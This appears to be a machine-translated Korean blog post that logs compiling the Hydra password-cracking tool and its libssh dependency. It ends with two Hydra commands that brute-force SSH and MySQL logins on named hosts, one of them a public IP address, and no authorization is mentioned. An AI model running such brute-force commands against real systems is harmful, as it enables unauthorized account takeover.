SSH,HTTP,MySQL 등 암호 해독
3774 단어 hydra
[root@srv-dfh526 hydra-7.6]#yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel mysql-devel
[root@srv-dfh526 hydra-7.6]# ./configure -h
Options:
--prefix=path path to install hydra and its datafiles to
--with-oracle=prefix prefix for oracle include dir
--with-oracle-lib=prefix prefix for oracle lib dir
--disable-xhydra disable compilation of hydra GUI
--nostrip do not per default strip binaries before install
--help this here
[root@srv-dfh526 bin]# cd /root/install/hydra-7.6
[root@srv-dfh526 hydra-7.6]# ./configure
Starting hydra auto configuration ...
Detected 64 Bit Linux OS
Checking for openssl (libssl, libcrypto, ssl.h, sha.h) ...
... found
Checking for idn (libidn.so) ...
... found
Checking for curses (libcurses.so / term.h) ...
... found, color output enabled
Checking for pcre (libpcre.so, pcre.h) ...
... found
Checking for Postgres (libpq.so, libpq-fe.h) ...
... found
Checking for SVN (libsvn_client-1 libapr-1.so libaprutil-1.so) ...
... NOT found, module svn disabled
Checking for firebird (libfbclient.so) ...
... NOT found, module firebird disabled
Checking for MYSQL client (libmysqlclient.so, math.h) ...
... found
Checking for AFP (libafpclient.so) ...
... NOT found, module Apple Filing Protocol disabled - Apple sucks anyway
Checking for NCP (libncp.so / nwcalls.h) ...
... NOT found, module NCP disabled
Checking for SAP/R3 (librfc/saprfc.h) ...
... NOT found, module sapr3 disabled
Get it from http://www.sap.com/solutions/netweaver/linux/eval/index.asp
Checking for libssh (libssh/libssh.h) ...
... NOT found, module ssh disabled
Get it from http://www.libssh.org
Checking for Oracle (libocci.so libclntsh.so / oci.h and libaio.so) ...
... NOT found, module Oracle disabled
Get basic and sdk package from http://www.oracle.com/technetwork/database/features/instant-client/index.html
Checking for GUI req's (pkg-config, gtk+-2.0) ...
... found
Checking for Android specialities ...
... rindex() found
... RSA_generate_key() found
Hydra will be installed into .../bin of: /usr/local
(change this by running ./configure --prefix=path)
Writing Makefile.in ...
now type "make"
[root@srv-dfh526 bin]# make
[root@srv-dfh526 bin]# make install
맞 추 는 것 이 신기 하 다.ssh 를 풀 려 고 시 도 했 는데 libssh 모듈 이 부족 하 다 는 것 을 발견 했다.
wget http://www.libssh.org/files/0.4/libssh-0.4.8.tar.gz
tar zxf libssh-0.4.8.tar.gz
cd libssh-0.4.8
mkdir build
cd build
cmake -DCMAKE_INSTALL_PREFIX=/usr -DCMAKE_BUILD_TYPE=Debug -DWITH_SSH1=ON ..
make
make install
ssh 설 치 를 기억 한 후에 도 제대로 작 동 하지 않 는 것 을 발견 했다.생각해 보 니 모듈 이 컴 파일 되 지 않 은 하 이 드 라 로 딩 되 지 않 았 기 때문에 설치 패키지 하 이 드 라-7.6 에 들 어가 make clean 을 다시 설치 합 니 다.실행 가능
hydra -L user.txt -P pass.txt -o savessh.log -f -vV -e ns 10.0.5.24 ssh
hydra -L user.txt -P sup.txt -o savessh.log -f -vV -e ns 113.105.144.130 mysql
이 내용에 흥미가 있습니까?
현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:
SSH,HTTP,MySQL 등 암호 해독맞 추 는 것 이 신기 하 다.ssh 를 풀 려 고 시 도 했 는데 libssh 모듈 이 부족 하 다 는 것 을 발견 했다. ssh 설 치 를 기억 한 후에 도 제대로 작 동 하지 않 는 것 을 발견 했다.생각해 보...
텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.